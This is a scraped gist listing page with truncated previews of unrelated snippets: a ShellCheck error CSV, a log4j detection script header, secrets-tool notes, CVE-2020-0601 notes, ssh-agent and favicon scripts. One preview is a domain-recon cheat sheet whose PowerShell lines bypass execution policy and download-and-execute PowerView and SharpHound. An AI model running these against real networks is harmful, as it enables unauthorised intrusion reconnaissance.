- SC1000 $ is not used specially and should therefore be escaped.
- SC1001 This
\o
will be a regular 'o' in this context. - SC1003 Want to escape a single quote? echo 'This is how it'\''s done'.
- SC1004 This backslash+linefeed is literal. Break outside single quotes if you just want to break the line.
- SC1007 Remove space after = if trying to assign a value (or for empty string, use var='' ... ).
- SC1008 This shebang was unrecognized. ShellCheck only supports sh/bash/dash/ksh. Add a 'shell' directive to specify.
- SC1009 The mentioned parser error was in ...
- SC1010 Use semicolo
We can make this file beautiful and searchable if this error is corrected: Unclosed quoted field in line 9.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
"name","link","description" | |
"SC1000","https://github.com/koalaman/shellcheck/wiki/SC1000","$ is not used specially and should therefore be escaped." | |
"SC1001","https://github.com/koalaman/shellcheck/wiki/SC1001","This `\o` will be a regular 'o' in this context." | |
"SC1003","https://github.com/koalaman/shellcheck/wiki/SC1003","Want to escape a single quote? echo 'This is how it'\\''s done'." | |
"SC1004","https://github.com/koalaman/shellcheck/wiki/SC1004","This backslash+linefeed is literal. Break outside single quotes if you just want to break the line." | |
"SC1007","https://github.com/koalaman/shellcheck/wiki/SC1007","Remove space after = if trying to assign a value (or for empty string, use var='' ... )." | |
"SC1008","https://github.com/koalaman/shellcheck/wiki/SC1008","This shebang was unrecognized. ShellCheck only supports sh/bash/dash/ksh. Add a 'shell' directive to specify." | |
"SC1009","https://github.com/koalaman/shellcheck/wiki/SC1009","The mentioned parser error was in ..." | |
"SC1010","https://github.com/koalaman/sh |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#! /usr/bin/env python3 | |
''' | |
Needs Requests (pip3 install requests) | |
Author: Marcello Salvati, Twitter: @byt3bl33d3r | |
License: DWTFUWANTWTL (Do What Ever the Fuck You Want With This License) | |
This should allow you to detect if something is potentially exploitable to the log4j 0day dropped on December 9th 2021. |
Currently, there is an explosion of tools that aim to manage secrets for automated, cloud native infrastructure management. Daniel Somerfield did some work classifying the various approaches, but (as far as I know) no one has made a recent effort to summarize the various tools.
This is an attempt to give a quick overview of what can be found out there. The list is alphabetical. There will be tools that are missing, and some of the facts might be wrong--I welcome your corrections. For the purpose, I can be reached via @maxvt on Twitter, or just leave me a comment here.
There is a companion feature matrix of various tools. Comments are welcome in the same manner.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# token.pickle stores the user's credentials from previously successful logins | |
if os.path.exists('token.pickle'): | |
print('Loading Credentials From File...') | |
with open('token.pickle', 'rb') as token: | |
credentials = pickle.load(token) | |
# Google's Request | |
from google.auth.transport.requests import Request |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Domain Recon | |
## ShareFinder - Look for shares on network and check access under current user context & Log to file | |
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt" | |
## Import PowerView Module | |
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')" | |
## Invoke-BloodHound for domain recon | |
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# IE is still braindead so still use favicon.ico | |
convert -resize x16 -gravity center -crop 16x16+0+0 -flatten -colors 256 input.png output-16x16.ico | |
convert -resize x32 -gravity center -crop 32x32+0+0 -flatten -colors 256 input.png output-32x32.ico | |
convert output-16x16.ico output-32x32.ico favicon.ico | |
# Then, HTML needs to specify size="XxY" as largest size due to browser bugs | |
<link rel="shortcut icon" href="/favicon.ico" sizes="32x32"> |
- Microsoft disclosed a vulnerability in their monthly Patch Tuesday referenced under CVE-2020-0601.
- The vulnerability was discovered by the U.S. National Security Agency, anounced today (2020-01-14) in their press conference, followed by a blog post and an official security advisory.
- The flaw is located in the "CRYPT32.DLL" file under the C:\Windows\System32\ directory.
- NSA description:
- NSA has discovered a critical vulnerability (CVE-2020-0601) affecting Microsoft Windows® cryptographic functionality.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Note: ~/.ssh/environment should not be used, as it | |
# already has a different purpose in SSH. | |
env=~/.ssh/agent.env | |
# Note: Don't bother checking SSH_AGENT_PID. It's not used | |
# by SSH itself, and it might even be incorrect | |
# (for example, when using agent-forwarding over SSH). | |
agent_is_running() { |
NewerOlder